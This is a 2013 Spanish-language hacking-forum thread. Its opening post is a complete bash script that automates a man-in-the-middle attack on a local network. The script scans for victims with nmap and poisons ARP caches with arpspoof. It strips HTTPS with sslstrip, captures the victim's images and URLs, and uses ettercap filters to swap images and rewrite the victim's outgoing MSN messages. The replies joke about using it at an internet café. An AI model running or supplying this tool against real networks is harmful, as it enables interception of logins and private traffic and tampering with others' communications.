Título: Ataque MITM automático!
Publicado por: aqqle en 19 Abril 2013, 15:59 pm
Os traigo un script automatizado hecho por mi y con una interface amigablee!! Este es para MITM ya saben... ESPERO Q LES GUSTE!! #!/bin/sh quit="no" configuracion_todo () { clear echo "------------------------------------------------" echo "Creando los filtros para ettercap..." echo "------------------------------------------------" sleep 1 echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter echo " }" >> mitmsg.filter echo "}" >> mitmsg.filter echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter echo "# note: replacement string is same length as original string" >> mitm.filter echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter echo " }" >> mitm.filter echo "}" >> mitm.filter echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter echo "msg(\"Filter Ran. \\n\");" >> mitm.filter echo "}" >> mitm.filter echo "--------------------------------------------> OK" echo "" sleep 1 echo "------------------------------------------------" echo "Configurar equipo para el ataque MITM" echo "------------------------------------------------" sleep 1 echo "Verificando los paquetes necesarios..." echo "------------------------------------------------" echo "xterm" verificacion=$(aptitude show xterm | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "xterm ya está instalado" else echo "xterm no está instalado, INSTALANDO..." sleep 1 sudo apt-get --force-yes install xterm & fi echo "--------------------------------------------> OK" sleep 1 echo "sslstrip" verificacion=$(aptitude show sslstrip | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "sslstrip ya está instalado" else echo "sslstrip no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install sslstrip & fi echo "--------------------------------------------> OK" sleep 1 echo "ettercap" verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}') if [ "$verificacion" = "install" ]; then echo "ettercap ya está instalado" else echo "ettercap no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install ettercap & fi echo "--------------------------------------------> OK" sleep 1 echo "dsniff" verificacion=$(aptitude show dsniff | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "dsniff ya está instalado" else echo "dsniff no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install dsniff & fi echo "--------------------------------------------> OK" sleep 1 echo "driftnet" verificacion=$(aptitude show driftnet | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "driftnet ya está instalado" else echo "driftnet no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install driftnet & fi echo "--------------------------------------------> OK" sleep 1 echo "" echo "" echo "Verificación de paquetes finalizada..." sleep 2 echo "" echo "Configurando etter.conf" xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & echo "--------------------------------------------> OK" sleep 1 echo "Activando ip_forward" xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward echo "--------------------------------------------> OK" sleep 1 echo "Configurando iptables" xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 & echo "--------------------------------------------> OK" sleep 2 echo "Indica tu interface de red:" echo "Ej: wlan0, eth1 ..." echo "" iwconfig echo "------------------------------------------------" interface=$(zenity --entry \ --title=".:MITM:." \ --text="Indica tu interface de red:" \ --text="(ej: wlan0, eth1, etc...)" \ ) sleep 1 echo "" echo "--------------------------------------------> OK" sleep 2 } busc_victima () { clear echo "------------------------------------------------" echo "Buscar víctima..." echo "------------------------------------------------" sleep 1 echo "" echo "Mostrando tu dirección ip:" sleep 1 tuip=$(ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20) ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20 echo "------------------------------------------------" echo "Indica el rango a escanear (ej: 192.168.0.* )" echo "------------------------------------------------" rango=$(zenity --entry \ --title="Rango a escanear por nmap .:MITM:." \ --text="Indica el rango a escanear" \ --text="Tu ip es:" \ --text="$tuip" \ ) sleep 1 echo "------------------------------------------------" echo "Mostrando lista de usuarios conectados a la red" echo "------------------------------------------------" sleep 1 xterm -T "Lista de usuarios conectados a la red .:MITM:." -n "AQQLE .:MITM:."-hold -e nmap -sP $rango --system-dns & } inic_mitm () { clear echo "------------------------------------------------" echo "Iniciar ataque MITM" echo "------------------------------------------------" sleep 1 echo "" echo "Iniciando sslstrip" xterm -hold -e sslstrip -a -k -f & echo "--------------------------------------------> OK" sleep 1 echo "" echo "Iniciando arpspoof" echo "Indica la ip de la puerta de enlace:" echo "------------------------------------------------" penlaces=$(zenity --entry \ --title="Iniciando arpspoof .:MITM:." \ --text="Indica la ip de la puerta de enlace:" \ --text="ej: 192.168.0.1" \ ) sleep 1 echo "------------------------------------------------" echo "Indica la ip de la víctima:" echo "------------------------------------------------" victima=$(zenity --entry \ --title="Iniciando arpspoof .:MITM:." \ --text="Indica la ip de la víctima" \ ) sleep 1 xterm -hold -e arpspoof -i $interface -t $victima $penlaces & echo "--------------------------------------------> OK" sleep 3 echo "" echo "Iniciando ettercap" xterm -hold -e sudo ettercap -T -q -i $interface & echo "--------------------------------------------> OK" sleep 1 echo "" echo "Iniciando driftnet" sleep 10 xterm -hold -e driftnet -i $interface & echo "--------------------------------------------> OK" echo "" echo "Iniciando urlsnarf" sleep 1 xterm -hold -e urlsnarf -i $interface & echo "--------------------------------------------> OK" sleep 2 } salida_x () { clear sleep 2 echo "Desactivando ip_forward" xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward & echo "--------------------------------------------> OK" sleep 2 echo "" echo "Eliminando posibles filtros creados" echo"" nohup rm imagen.ef nohup rm msg.ef echo "" echo "--------------------------------------------> OK" sleep 2 echo "" echo "Configurando etter.conf" xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & echo "--------------------------------------------> OK" sleep 2 rm mitm.filter rm mitmsg.filter rm nohup.out clear } camb_imagen () { clear echo "------------------------------------------------" echo "Cambiar imagenes" echo "------------------------------------------------" sleep 1 echo "" echo "Indica la dirección de la imagen falsa:" echo "Ej: http://www.arcpujol.com/construccio.jpg" echo "------------------------------------------------" direccionfalsa=$(zenity --entry \ --title="Construyendo filtro .:MITM:." \ --text="Indica la dirección de la imagen falsa:" \ --text="Ej: http://www.pagweb/imagen.jpg" \ ) xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter & sleep 1 echo "Creando el filtro..." xterm -e etterfilter mitm.filter -o imagen.ef & echo "--------------------------------------------> OK" rm mitm.filter mv mitm.filtere mitm.filter echo "Iniciando ataque..." xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // & echo "--------------------------------------------> OK" sleep 1 } camb_msn () { clear echo "------------------------------------------------" echo "Cambiar los mensajes salientes de msn" echo "------------------------------------------------" sleep 1 echo "" echo "Indica primero qué palabra quieres cambiar" echo "Ej: hola" echo "------------------------------------------------" convfalsa=$(zenity --entry \ --title="Creando filtro ettercap .:MITM:." \ --text="Indica primero qué palabra quieres cambiar" \ ) cp mitmsg.filter mitmsg.filter1 xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter & echo "" rm mitmsg.filtere echo "Indica la palabra que sustituirá a la anterior" echo "Ej: perra" echo "------------------------------------------------" convfalsa1=$(zenity --entry \ --title="Creando filtro ettercap .:MITM:." \ --text="Indica la palabra que sustituirá a la anterior" \ ) xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter & rm mitmsg.filtere sleep 1 echo "Creando el filtro..." xterm -e etterfilter mitmsg.filter -o msg.ef & echo "--------------------------------------------> OK" rm mitmsg.filter mv mitmsg.filter1 mitm.filter echo "Iniciando ataque..." xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // & echo "--------------------------------------------> OK" sleep 1 } while [ $quit != "yes" ] do clear echo "------------------------------------------------" echo " AQQLE / AQQLE / AQQLE / AQQLE/" echo "AQQLE/ /AQQLE/ /AQQLE / /AQQLE/ /" echo " / AQQLE /AQQLE/ /AQQLE / AQQLE" echo "------------------------------------------------" echo "" echo "" echo "Menú de opciones MITM" echo "================================================" echo "* Configuración necesaria para el ataque MITM" echo "------------------------------------------------" echo "* Buscar víctima" echo "* Iniciar ataque MITM" echo "* Cambiar las imagenes entrantes a la víctima" echo "* Cambiar las conversaciones de msn salientes" echo "------------------------------------------------" echo "* Salir" echo "------------------------------------------------" echo "" echo -n "Escoje acción"
eleccion=$(zenity --list --column "Opciones:" "Configuración" "Buscar víctima" "Iniciar ataque MITM" "Cambiar imagenes entrantes" "Cambiar conversaciones salientes" "Salir" --text "Escoje acción:" --title="Menú .:MITM:. por aqqle" --height=245 --width=250)
if [ "$eleccion" = "Configuración" ]; then configuracion_todo;
elif [ "$eleccion" = "Buscar víctima" ]; then busc_victima;
elif [ "$eleccion" = "Iniciar ataque MITM" ]; then inic_mitm;
elif [ "$eleccion" = "Cambiar imagenes entrantes" ]; then camb_imagen; elif [ "$eleccion" = "Cambiar conversaciones salientes" ]; then camb_msn; elif [ "$eleccion" = "Salir" ]; then salida_x; quit="yes"; else exit 0 fi done
Título: Re: Ataque MITM automático!
Publicado por: OmarHack en 19 Abril 2013, 19:33 pm
¿Que ganas de ir al ciber no? :silbar:
Título: Re: Ataque MITM automático!
Publicado por: JonaLamper en 22 Agosto 2013, 12:29 pm
Siento resucitar el tema, pero... ¿Alguien puede decirme si le ha funcionado esto?
|